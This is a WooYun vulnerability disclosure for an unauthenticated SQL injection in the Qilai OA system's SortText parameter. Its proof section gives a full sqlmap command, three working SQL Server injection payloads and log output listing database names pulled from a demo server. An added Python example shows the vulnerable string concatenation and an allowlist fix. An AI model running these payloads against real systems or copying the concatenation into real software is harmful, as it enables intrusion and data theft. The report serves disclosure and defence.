
Vulnerability summary

Defect ID: wooyun-2015-0151002

Title: Qilai OA (启莱OA) system unauthenticated SQL injection (reproduced on the demo site)

Vendor: qioa.cn

Author: 路人甲

Submitted: 2015-11-02 15:50

Fixed: 2016-02-05 16:00

Published: 2016-02-05 16:00

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: the vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-11-02: Details sent to the vendor; awaiting vendor response
2015-11-07: Vendor actively ignored the vulnerability; details opened to third-party security partners (绿盟科技唐朝安全巡航)
2016-01-01: Details disclosed to core white hats and relevant domain experts
2016-01-11: Details disclosed to regular white hats
2016-01-21: Details disclosed to intern white hats
2016-02-05: Details disclosed to the public

Brief description:

~

Detailed description:

Demo address:
http://**.**.**.**:8888/MyWork/YinZhang/MyYinZhang.aspx --data "__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=[base64 ViewState omitted]&DelData=%C9%BE+%B3%FD&Name=&GridView1%24ctl02%24CheckSelect=on&GoPage=&DropDownList1=50&SortText=order+by+id+desc"
The SortText parameter is injectable.
The URL does not open directly in a browser, but the injection still works.
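The injected value is an ORDER BY fragment, which cannot be passed as a bound query parameter, so the fix is to accept only an allowlisted column name and direction and rebuild the clause from those tokens. The following is an added example, not code from the report or from the Qilai OA product; the table name YinZhang and the column allowlist are assumptions, and the rejected inputs are the three SortText payloads sqlmap reported in the proof section below.

```python
import re

# Constructed allowlist for this example; the application's real sortable columns are not known.
ALLOWED_COLUMNS = {"id", "name", "createdate"}
ALLOWED_DIRECTIONS = {"asc", "desc"}

# A legal SortText value is exactly "order by <column> [asc|desc]" and nothing more.
_SORT_RE = re.compile(
    r"^\s*order\s+by\s+([A-Za-z_][A-Za-z0-9_]*)(?:\s+(asc|desc))?\s*$", re.IGNORECASE
)


def vulnerable_query(sort_text):
    """The pattern the report implies: the raw parameter is appended to the SQL text."""
    return "SELECT * FROM YinZhang " + sort_text  # table name is an assumption


def parse_sort_text(sort_text):
    """Return (column, direction) for a well-formed, allowlisted clause, else None."""
    m = _SORT_RE.match(sort_text)
    if not m:
        return None
    column = m.group(1).lower()
    direction = (m.group(2) or "asc").lower()
    if column not in ALLOWED_COLUMNS or direction not in ALLOWED_DIRECTIONS:
        return None
    return column, direction


def safe_query(sort_text):
    """Build ORDER BY from the validated tokens only, never from the raw parameter."""
    parsed = parse_sort_text(sort_text)
    if parsed is None:
        raise ValueError("rejected SortText value")
    column, direction = parsed
    return "SELECT * FROM YinZhang ORDER BY %s %s" % (column, direction.upper())


# The three SortText values sqlmap reported against the demo, plus the legitimate one.
REPORTED_PAYLOADS = [
    "(SELECT (CASE WHEN (9454=9454) THEN 9454 ELSE 9454*(SELECT 9454 FROM master..sysdatabases) END))",
    "order by id desc;WAITFOR DELAY '0:0:5'--",
    "order by id desc WAITFOR DELAY '0:0:5'",
]
LEGITIMATE = "order by id desc"


def evaluate(sort_text):
    """True if the hardened builder would accept this SortText value."""
    return parse_sort_text(sort_text) is not None


if __name__ == "__main__":
    for value in REPORTED_PAYLOADS + [LEGITIMATE]:
        print("%-4s %s" % ("ok" if evaluate(value) else "drop", value))
```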

Proof of vulnerability:

C:\Python27\sqlmap>sqlmap.py -u http://**.**.**.**:8888/MyWork/YinZhang/MyYinZhang.aspx --data "__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=[base64 ViewState omitted]&DelData=%C9%BE+%B3%FD&Name=&GridView1%24ctl02%24CheckSelect=on&GoPage=&DropDownList1=50&SortText=order+by+id+desc" --dbs
sqlmap {1.0-dev-nongit-20151002}
[*] starting at 08:18:12
[08:18:12] [WARNING] provided value for parameter '__EVENTTARGET' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[08:18:12] [WARNING] provided value for parameter '__EVENTARGUMENT' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[08:18:12] [WARNING] provided value for parameter '__LASTFOCUS' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[08:18:12] [WARNING] provided value for parameter 'Name' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[08:18:12] [WARNING] provided value for parameter 'GoPage' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[08:18:12] [INFO] resuming back-end DBMS 'microsoft sql server'
[08:18:12] [INFO] testing connection to the target URL
[08:18:12] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: SortText (POST)
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter replace
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=[base64 ViewState omitted]&DelData=%C9%BE %B3%FD&Name=&GridView1$ctl02$CheckSelect=on&GoPage=&DropDownList1=50&SortText=(SELECT (CASE WHEN (9454=9454) THEN 9454 ELSE 9454*(SELECT 9454 FROM master..sysdatabases) END))

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=[base64 ViewState omitted]&DelData=%C9%BE %B3%FD&Name=&GridView1$ctl02$CheckSelect=on&GoPage=&DropDownList1=50&SortText=order by id desc;WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=[base64 ViewState omitted]&DelData=%C9%BE %B3%FD&Name=&GridView1$ctl02$CheckSelect=on&GoPage=&DropDownList1=50&SortText=order by id desc WAITFOR DELAY '0:0:5'
---
[08:18:12] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[08:18:12] [INFO] fetching database names
[08:18:12] [INFO] fetching number of databases
[08:18:12] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[08:18:12] [INFO] retrieved:
[08:18:13] [WARNING] reflective value(s) found and filtering out
[08:18:13] [WARNING] time-based comparison requires larger statistical model, please wait...........................
[08:18:19] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
2
[08:18:37] [INFO] adjusting time delay to 1 second due to good response times
1
[08:18:38] [INFO] retrieved:
[08:18:40] [INFO] retrieved: eduoa
[08:19:08] [INFO] retrieved:
[08:19:10] [INFO] retrieved: eduoa2
[08:19:44] [INFO] retrieved:
[08:19:46] [INFO] retrieved: feibao
[08:20:18] [INFO] retrieved:
[08:20:20] [INFO] retrieved: govoa
[08:20:51] [INFO] retrieved:
[08:20:53] [INFO] retrieved: henan
[08:21:23] [INFO] retrieved:
[08:21:26] [INFO] retrieved: master
[08:22:01] [INFO] retrieved:
[08:22:03] [INFO] retrieved: mod
[08:22:28] [ERROR] invalid character detected. retrying..
[08:22:28] [WARNING] increasing time delay to 2 seconds
el
[08:22:49] [INFO] retrieved:
[08:22:51] [INFO] retrieved: msdb
[08:23:29] [INFO] retrieved:
[08:23:31] [INFO] retrieved:
[08:23:43] [ERROR] invalid character detected. retrying..
[08:23:43] [WARNING] increasing time delay to 3 seconds
neioa
[08:24:48] [INFO] retrieved:
[08:24:50] [INFO] retrieved: newoaa
[08:26:05] [INFO] retrieved:
[08:26:07] [INFO] retrieved: nmoa
[08:27:04] [INFO] retrieved:
[08:27:06] [INFO] retrieved: RDHRDATA_2005
[08:29:41] [INFO] retrieved:
[08:29:43] [INFO] retrieved: Rep

Fix recommendation:

~~

Copyright notice: please credit the source when reposting: 路人甲@乌云


Vulnerability response

Vendor response:

Severity: No impact, vendor ignored

Ignored on: 2016-02-05 16:00

Vendor reply:

Vulnerability Rank: 4 (WooYun rating)

Latest status:

None